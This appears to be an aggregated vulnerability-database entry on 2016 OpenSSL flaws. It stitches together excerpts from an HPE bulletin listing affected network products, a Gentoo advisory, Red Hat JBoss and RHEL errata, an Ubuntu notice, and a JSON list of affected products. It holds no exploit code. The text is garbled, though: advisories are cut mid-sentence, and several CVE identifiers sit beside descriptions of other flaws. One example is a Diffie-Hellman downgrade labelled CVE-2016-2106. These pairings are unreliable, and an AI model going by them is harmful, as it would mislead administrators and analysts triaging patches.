- JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5940 - Version: R2509
- HP Network Products
- JH390A HPE FlexFabric 5940 48SFP+ 6QSFP28 Switch
- JH391A HPE FlexFabric 5940 48XGT 6QSFP28 Switch
- JH394A HPE FlexFabric 5940 48XGT 6QSFP+ Switch
- JH395A HPE FlexFabric 5940 48SFP+ 6QSFP+ Switch
- JH396A HPE FlexFabric 5940 32QSFP+ Switch
- JH397A HPE FlexFabric 5940 2-slot Switch
- JH398A HPE FlexFabric 5940 4-slot Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5950 - Version: R6123
- HP Network Products
- JH321A HPE FlexFabric 5950 32QSFP28 Switch
- JH402A HPE FlexFabric 5950 48SFP28 8QSFP28 Switch
- JH404A HPE FlexFabric 5950 4-slot Switch
- 12900E (Comware 7) - Version: R2609
- HP Network Products
- JG619A HP FlexFabric 12910 Switch AC Chassis
- JG621A HP FlexFabric 12910 Main Processing Unit
- JG632A HP FlexFabric 12916 Switch AC Chassis
- JG634A HP FlexFabric 12916 Main Processing Unit
- JH104A HP FlexFabric 12900E Main Processing Unit
- JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit
- JH263A HP FlexFabric 12904E Main Processing Unit
- JH255A HP FlexFabric 12908E Switch Chassis
- JH262A HP FlexFabric 12904E Switch Chassis
- JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis
- JH103A HP FlexFabric 12916E Switch Chassis
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
iMC Products
- iNode PC 7.2 (E0410) - Version: 7.2 E0410
- HP Network Products
- JD144A HP A-IMC User Access Management Software Module with 200-user License
- JD147A HP IMC Endpoint Admission Defense Software Module with 200-user License
- JD435A HP A-IMC Endpoint Admission Defense Client Software
- JF388A HP IMC User Authentication Management Software Module with 200-user License
- JF388AAE HP IMC User Authentication Management Software Module with 200-user E-LTU
- JF391A HP IMC Endpoint Admission Defense Software Module with 200-user License
- JF391AAE HP IMC Endpoint Admission Defense Software Module with 200-user E-LTU
- JG752AAE HP IMC User Access Manager Software Module with 50-user E-LTU
- JG754AAE) HP IMC Endpoint Admission Defense Software Module with 50-user E-LTU
- CVEs
- CVE-2016-2106
- CVE-2016-2109
- CVE-2016-2176
- iMC UAM_TAM 7.2-E0409 - Version: 7.2 E0409
- HP Network Products
- JF388A HP IMC UAM S/W MODULE W/200-USER LICENSE
- JF388AAE HP IMC UAM S/W MODULE W/200-USER E-LTU
- JG752AAE HP IMC UAM SW MOD W/ 50-USER E-LTU
- JG483A HP IMC TAM S/W MODULE W/100-NODE LIC
- JG483AAE HP IMC TAM S/W MODULE W/100-NODE E-LTU
- JG764AAE HP IMC TAM SW MOD W/ 50-NODE E-LTU
- CVEs
- CVE-2016-2106
- CVE-2016-2109
- CVE-2016-2176
VCX Products
- VCX - Version: 9.8.19
- HP Network Products
- J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr
- J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr
- JC517A HP VCX V7205 Platform w/DL 360 G6 Server
- JE355A HP VCX V6000 Branch Platform 9.0
- JC516A HP VCX V7005 Platform w/DL 120 G6 Server
- JC518A HP VCX Connect 200 Primry 120 G6 Server
- J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr
- JE341A HP VCX Connect 100 Secondary
- JE252A HP VCX Connect Primary MIM Module
- JE253A HP VCX Connect Secondary MIM Module
- JE254A HP VCX Branch MIM Module
- JE355A HP VCX V6000 Branch Platform 9.0
- JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod
- JD023A HP MSR30-40 Router with VCX MIM Module
- JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM
- JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod
- JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod
- JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod
- JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS
- JE340A HP VCX Connect 100 Pri Server 9.0
- JE342A HP VCX Connect 100 Sec Server 9.0
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
Note: Please contact HPE Technical Support if any assistance is needed acquiring the software updates.
HISTORY Version:1 (rev.1) - 2 June 2017 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. (CVE-2016-5387)
-
It was discovered that OpenSSL would accept ephemeral RSA keys when using non-export RSA cipher suites. A malicious server could make a TLS/SSL client using OpenSSL use a weaker key exchange method. (CVE-2016-3110)
-
It was found that OpenSSL's BigNumber Squaring implementation could produce incorrect results under certain special conditions. Note that this issue occurred rarely and with a low probability, and there is currently no known way of exploiting it.
The References section of this erratum contains a download link (you must log in to download the update).
Gentoo Linux Security Advisory GLSA 201612-16
https://security.gentoo.org/
Severity: Normal Title: OpenSSL: Multiple vulnerabilities Date: December 07, 2016 Bugs: #581234, #585142, #585276, #591454, #592068, #592074, #592082, #594500, #595186 ID: 201612-16
Synopsis
Multiple vulnerabilities have been found in OpenSSL, the worst of which allows attackers to conduct a time based side-channel attack. Please review the CVE identifiers and the International Association for Cryptologic Research's (IACR) paper, "Make Sure DSA Signing Exponentiations Really are Constant-Time" for further details. Additionally, a time based side-channel attack may allow a local attacker to recover a private DSA key.
Workaround
There is no known workaround at this time.
Resolution
All OpenSSL users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.2j"
References
[ 1 ] CVE-2016-2105 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2105 [ 2 ] CVE-2016-2106 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2106 [ 3 ] CVE-2016-2107 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2107 [ 4 ] CVE-2016-2108 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2108 [ 5 ] CVE-2016-2109 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2109 [ 6 ] CVE-2016-2176 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2176 [ 7 ] CVE-2016-2177 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2177 [ 8 ] CVE-2016-2178 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2178 [ 9 ] CVE-2016-2180 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2180 [ 10 ] CVE-2016-2183 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2183 [ 11 ] CVE-2016-6304 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6304 [ 12 ] CVE-2016-6305 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6305 [ 13 ] CVE-2016-6306 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6306 [ 14 ] CVE-2016-7052 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7052 [ 15 ] Make Sure DSA Signing Exponentiations Really are Constant-Time http://eprint.iacr.org/2016/594.pdf
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201612-16
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. Description:
Red Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.
This release includes bug fixes and enhancements, as well as a new release of OpenSSL that addresses a number of outstanding security flaws. For further information, see the knowledge base article linked to in the References section. The JBoss server process must be restarted for the update to take effect. (CVE-2016-2108)
-
Multiple flaws were found in the way httpd parsed HTTP requests and responses using chunked transfer encoding. A remote attacker could use these flaws to create a specially crafted request, which httpd would decode differently from an HTTP proxy software in front of it, possibly leading to HTTP request smuggling attacks. (CVE-2015-3195)
-
A flaw was found in the way the TLS protocol composes the Diffie-Hellman exchange (for both export and non-export grade cipher suites). An attacker could use this flaw to downgrade a DHE connection to use export-grade key sizes, which could then be broken by sufficient pre-computation. This can lead to a passive man-in-the-middle attack in which the attacker is able to decrypt all traffic. (CVE-2016-2106)
-
It was discovered that it is possible to remotely Segfault Apache http server with a specially crafted string sent to the mod_cluster via service messages (MCMP). (CVE-2016-2109)
-
It was discovered that specifying configuration with a JVMRoute path longer than 80 characters will cause segmentation fault leading to a server crash. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: openssl security update Advisory ID: RHSA-2016:0722-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-0722.html Issue date: 2016-05-09 CVE Names: CVE-2016-0799 CVE-2016-2105 CVE-2016-2106 CVE-2016-2107 CVE-2016-2108 CVE-2016-2109 CVE-2016-2842 =====================================================================
- Summary:
An update for openssl is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.
Security Fix(es):
-
A flaw was found in the way OpenSSL encoded certain ASN.1 data structures. (CVE-2016-2105, CVE-2016-2106)
-
It was discovered that OpenSSL leaked timing information when decrypting TLS/SSL and DTLS protocol encrypted records when the connection used the AES CBC cipher suite and the server supported AES-NI. A remote attacker could possibly use this flaw to retrieve plain text from encrypted packets by using a TLS/SSL or DTLS server as a padding oracle. (CVE-2016-2107)
-
Several flaws were found in the way BIO_*printf functions were implemented in OpenSSL. (CVE-2016-0799, CVE-2016-2842)
-
A denial of service flaw was found in the way OpenSSL parsed certain ASN.1-encoded data from BIO (OpenSSL's I/O abstraction) inputs. An application using OpenSSL that accepts untrusted ASN.1 BIO input could be forced to allocate an excessive amount of data. (CVE-2016-2109)
Red Hat would like to thank the OpenSSL project for reporting CVE-2016-2108, CVE-2016-2842, CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, and CVE-2016-0799. Upstream acknowledges Huzaifa Sidhpurwala (Red Hat), Hanno Böck, and David Benjamin (Google) as the original reporters of CVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2842, CVE-2016-2105, CVE-2016-2106, and CVE-2016-0799; and Juraj Somorovsky as the original reporter of CVE-2016-2107.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: openssl-1.0.1e-51.el7_2.5.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.5.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.5.i686.rpm openssl-libs-1.0.1e-51.el7_2.5.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.5.i686.rpm openssl-devel-1.0.1e-51.el7_2.5.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.5.x86_64.rpm openssl-static-1.0.1e-51.el7_2.5.i686.rpm openssl-static-1.0.1e-51.el7_2.5.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssl-1.0.1e-51.el7_2.5.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.5.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.5.i686.rpm openssl-libs-1.0.1e-51.el7_2.5.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.5.i686.rpm openssl-devel-1.0.1e-51.el7_2.5.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.5.x86_64.rpm openssl-static-1.0.1e-51.el7_2.5.i686.rpm openssl-static-1.0.1e-51.el7_2.5.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssl-1.0.1e-51.el7_2.5.src.rpm
ppc64: openssl-1.0.1e-51.el7_2.5.ppc64.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.ppc64.rpm openssl-devel-1.0.1e-51.el7_2.5.ppc.rpm openssl-devel-1.0.1e-51.el7_2.5.ppc64.rpm openssl-libs-1.0.1e-51.el7_2.5.ppc.rpm openssl-libs-1.0.1e-51.el7_2.5.ppc64.rpm
ppc64le: openssl-1.0.1e-51.el7_2.5.ppc64le.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.ppc64le.rpm openssl-devel-1.0.1e-51.el7_2.5.ppc64le.rpm openssl-libs-1.0.1e-51.el7_2.5.ppc64le.rpm
s390x: openssl-1.0.1e-51.el7_2.5.s390x.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.s390x.rpm openssl-devel-1.0.1e-51.el7_2.5.s390.rpm openssl-devel-1.0.1e-51.el7_2.5.s390x.rpm openssl-libs-1.0.1e-51.el7_2.5.s390.rpm openssl-libs-1.0.1e-51.el7_2.5.s390x.rpm
x86_64: openssl-1.0.1e-51.el7_2.5.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.5.i686.rpm openssl-devel-1.0.1e-51.el7_2.5.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.5.i686.rpm openssl-libs-1.0.1e-51.el7_2.5.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: openssl-debuginfo-1.0.1e-51.el7_2.5.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.ppc64.rpm openssl-perl-1.0.1e-51.el7_2.5.ppc64.rpm openssl-static-1.0.1e-51.el7_2.5.ppc.rpm openssl-static-1.0.1e-51.el7_2.5.ppc64.rpm
ppc64le: openssl-debuginfo-1.0.1e-51.el7_2.5.ppc64le.rpm openssl-perl-1.0.1e-51.el7_2.5.ppc64le.rpm openssl-static-1.0.1e-51.el7_2.5.ppc64le.rpm
s390x: openssl-debuginfo-1.0.1e-51.el7_2.5.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.s390x.rpm openssl-perl-1.0.1e-51.el7_2.5.s390x.rpm openssl-static-1.0.1e-51.el7_2.5.s390.rpm openssl-static-1.0.1e-51.el7_2.5.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.5.x86_64.rpm openssl-static-1.0.1e-51.el7_2.5.i686.rpm openssl-static-1.0.1e-51.el7_2.5.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssl-1.0.1e-51.el7_2.5.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.5.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.5.i686.rpm openssl-devel-1.0.1e-51.el7_2.5.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.5.i686.rpm openssl-libs-1.0.1e-51.el7_2.5.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.5.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.5.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.5.x86_64.rpm openssl-static-1.0.1e-51.el7_2.5.i686.rpm openssl-static-1.0.1e-51.el7_2.5.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2016-0799 https://access.redhat.com/security/cve/CVE-2016-2105 https://access.redhat.com/security/cve/CVE-2016-2106 https://access.redhat.com/security/cve/CVE-2016-2107 https://access.redhat.com/security/cve/CVE-2016-2108 https://access.redhat.com/security/cve/CVE-2016-2109 https://access.redhat.com/security/cve/CVE-2016-2842 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFXMFlTXlSAg2UNWIIRAhYAAJ0T9Ib2vXUa5te34i6fphHrbe0HlwCfePy5 WjaK8x9OaI0FgbWyfxvwq6o= =jHjh -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce. ============================================================================ Ubuntu Security Notice USN-2959-1 May 03, 2016
openssl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 LTS
- Ubuntu 15.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in OpenSSL. (CVE-2016-2106)
Brian Carpenter discovered that OpenSSL incorrectly handled memory when ASN.1 data is read from a BIO. (CVE-2016-2109)
As a security improvement, this update also modifies OpenSSL behaviour to reject DH key sizes below 1024 bits, preventing a possible downgrade attack.
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 16.04 LTS: libssl1.0.0 1.0.2g-1ubuntu4.1
Ubuntu 15.10: libssl1.0.0 1.0.2d-0ubuntu1.5
Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.19
Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.36
After a standard system update you need to reboot your computer to make all the necessary changes
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201605-0076", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.2b" }, { "model": "enterprise linux hpc node eus", "scope": "eq", "trust": 1.3, "vendor": "redhat", "version": "7.2" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.3, "vendor": "redhat", "version": "7.2" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.3, "vendor": "redhat", "version": "7.2" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2f" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2a" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2e" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2c" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2g" }, { "model": "openssl", "scope": "lte", "trust": 1.0, "vendor": "openssl", "version": "1.0.1s" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2d" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "registered envelope service", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "paging server", "scope": "ne", "trust": 0.6, "vendor": "cisco", "version": "11.5.1" }, { "model": "nexus series switches 5.2 sv3", "scope": "ne", "trust": 0.6, "vendor": "cisco", "version": "1000v" }, { "model": "network performance analytics", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "ironport encryption appliance", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "spa51x series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mate collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ata series analog terminal adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "network health framework", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4.1" }, { "model": "spa232d multi-line dect ata", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2(1)" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2.2.1" }, { "model": "unified series ip phones", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "780011.5.2" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.0" }, { "model": "clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "lancope stealthwatch flowcollector netflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(3.10000.9)" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.6(3)" }, { "model": "10.2-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.3" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server mr2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "87104.2" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.40" }, { "model": "emergency responder", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "video distribution suite for internet streaming", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3.2" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2.2" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.53" }, { "model": "tivoli netcool system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "lancope stealthwatch udp director", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.2" }, { "model": "nexus series blade switches 0.9.8zf", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4000" }, { "model": "telepresence isdn link", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.1.6" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "project openssl 1.0.2g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.1" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32400" }, { "model": "telepresence sx series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3.7" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.5.1.6" }, { "model": "unified intelligent contact management enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.51" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "85100" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.5.1.131" }, { "model": "unified workforce optimization", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", 